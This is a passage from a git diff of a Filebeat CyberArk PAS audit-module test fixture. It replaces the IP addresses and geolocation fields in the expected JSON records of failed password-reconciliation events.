07:44:37","IsoTimestamp":"2021-03-15T14:44:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log-expected.json
index cac21295fdbb..2ad338b74850 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log-expected.json
@@ -2,41 +2,42 @@
     {
         "@timestamp": "2021-03-11T21:12:22.000Z",
         "cyberarkpas.audit.action": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615497142",
         "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask",
         "cyberarkpas.audit.ca_properties.retries_count": "0",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart",
         "cyberarkpas.audit.desc": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T21:12:22Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 13:12:22</Timestamp>\n    <IsoTimestamp>2021-03-11T21:12:22Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615497142\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 13:12:22</Timestamp>\n    <IsoTimestamp>2021-03-11T21:12:22Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615497142\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 11 13:12:22",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "event.action": "cpm reconcile password failed",
         "event.category": [
             "iam"
@@ -54,7 +55,7 @@
             "error",
             "user"
         ],
-        "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
@@ -67,7 +68,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC\\bart",
@@ -86,42 +87,43 @@
     {
         "@timestamp": "2021-03-14T13:18:15.000Z",
         "cyberarkpas.audit.action": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615727895",
         "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask",
         "cyberarkpas.audit.ca_properties.retries_count": "2",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart",
         "cyberarkpas.audit.desc": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.other.retriescount": "2",
         "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:18:15Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:18:15</Timestamp>\n    <IsoTimestamp>2021-03-14T13:18:15Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"2\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615727895\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:18:15</Timestamp>\n    <IsoTimestamp>2021-03-14T13:18:15Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=2;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"2\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615727895\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 14 06:18:15",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "event.action": "cpm reconcile password failed",
         "event.category": [
             "iam"
@@ -139,11 +141,11 @@
             "error",
             "user"
         ],
-        "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3917,
+        "log.offset": 3901,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -152,7 +154,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC\\bart",
@@ -197,11 +199,6 @@
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 14 06:46:13",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "event.action": "cpm reconcile password failed",
         "event.category": [
@@ -224,7 +221,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 7864,
+        "log.offset": 7832,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -252,42 +249,43 @@
     {
         "@timestamp": "2021-03-14T14:49:11.000Z",
         "cyberarkpas.audit.action": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615733350",
         "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask",
         "cyberarkpas.audit.ca_properties.retries_count": "3",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart",
         "cyberarkpas.audit.desc": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.other.retriescount": "3",
         "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T14:49:11Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 07:49:11</Timestamp>\n    <IsoTimestamp>2021-03-14T14:49:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"3\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615733350\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 07:49:11</Timestamp>\n    <IsoTimestamp>2021-03-14T14:49:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>60</MessageID>\n    <Desc>CPM Reconcile Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Reconcile Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=3;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Reconcile Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"3\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615733350\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 14 07:49:11",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "event.action": "cpm reconcile password failed",
         "event.category": [
             "iam"
@@ -305,11 +303,11 @@
             "error",
             "user"
         ],
-        "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 11884,
+        "log.offset": 11852,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -318,7 +316,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC\\bart",
@@ -337,42 +335,43 @@
     {
         "@timestamp": "2021-03-15T10:12:18.000Z",
         "cyberarkpas.audit.action": "CPM Reconcile Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615803137",
         "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
